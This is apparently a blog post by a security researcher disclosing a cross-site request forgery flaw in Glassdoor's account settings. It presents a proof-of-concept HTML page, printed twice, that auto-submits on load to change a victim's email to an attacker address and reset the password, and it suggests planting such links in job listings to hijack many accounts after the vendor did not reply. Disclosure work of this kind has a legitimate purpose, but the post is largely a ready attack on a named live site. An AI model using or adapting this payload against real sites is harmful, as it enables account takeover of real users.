Hello i'm Mohamed M.Fouad an Independent Security Researcher from Egypt. I have been got acknowledgement from many of the Firms like as Microsoft,Oracle,Yahoo,eBay,Sony,AT&T,Huawui,Adobe,DropCam, Bitcasa, Get Pocket, Splitwise and so many...
================================================
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Glassdoor is an American site where employees and former employees anonymously review companies and their management. In the year prior to April 2014, more than 500,000 company reviews were submitted to the site. Launched in 2007.
Hello Guys!
Today i will show you how I discovered a lot of critical security vulnerabilities at (Glassdoor) it can lead to very harmful impact on all users by force users change their passwords , change emails or change anything in their profile settings like job alerts... but these vulnerabilities can be escalated to deface all the site by posting malicious urls in Jobs reviews and all users password will be changed.
Story :
Before i begin i would like to warn glassdoor to fix this security vulnerability because it can harm their website and all users like what happend in jobvite about my article published in thehackernews then jobvite changed their website due to dangerous security vulnerabilities SQLi and LFI . i report CSRF Account hijacking vulnerability to other jobs websites and they fixed it immediately because of it's so critical. also i need to announce all users that i focused on jobs websites 6 months ago and i found that it's not secure at all with this vulnerability and also another dangerous vulnerabilities like SQLi , XSS, Broken Authentication and Indirect Object Reference vulnerabilities when i report different famous jobs websites about these critical vulnerabilities i got great bounties and they hired me as a Freelancer security consultant .
Story :
One Month and half ago i found Critical Vulnerability in glassdoor and it was account hijacking via csrf vulnerability and attacker can use it to deface all the website by adding a new job with malicious url to change users passwords after visit the job. so when i tried to contact them via emails and social network media they didn't reply me.
Impact was you can change any details in user account settings and this is the most critical point in this article so you can change user password ,change user e-mail and this can be done via just one-click malicious URL.
Below is the Critical one !!!!
Change Email Address and Password CSRF :
=============================================
<html>
<body onload="document.csrf.submit()">
<formaction="https://www.glassdoor.com/member/account/settings_execute.htm" method="post" name="csrf">
<input type="hidden" name="selTabIndex=1" value="1"><br>
<inputtype="hidden"name="emailAddress" value="attacker@hotmail.com"><br>
<input type="hidden" name="birthYear" value=""><br>
<input type="hidden" name="race" value=""><br>
<input type="hidden" name="highestEducation" value=""><br>
<input type="hidden" name="newPassword" value="hacked@2014"><br>
<input type="hidden" name="confirmPassword" value="hacked@2014"><br>
</form>
</form>
</body>
=============================================
<html>
<body onload="document.csrf.submit()">
<formaction="https://www.glassdoor.com/member/account/settings_execute.htm" method="post" name="csrf">
<input type="hidden" name="selTabIndex=1" value="1"><br>
<inputtype="hidden"name="emailAddress" value="attacker@hotmail.com"><br>
<input type="hidden" name="birthYear" value=""><br>
<input type="hidden" name="race" value=""><br>
<input type="hidden" name="highestEducation" value=""><br>
<input type="hidden" name="newPassword" value="hacked@2014"><br>
<input type="hidden" name="confirmPassword" value="hacked@2014"><br>
</form>
</form>
</body>
Hope you find it interesting and HAVE FUN with POC Video :)
No comments:
Post a Comment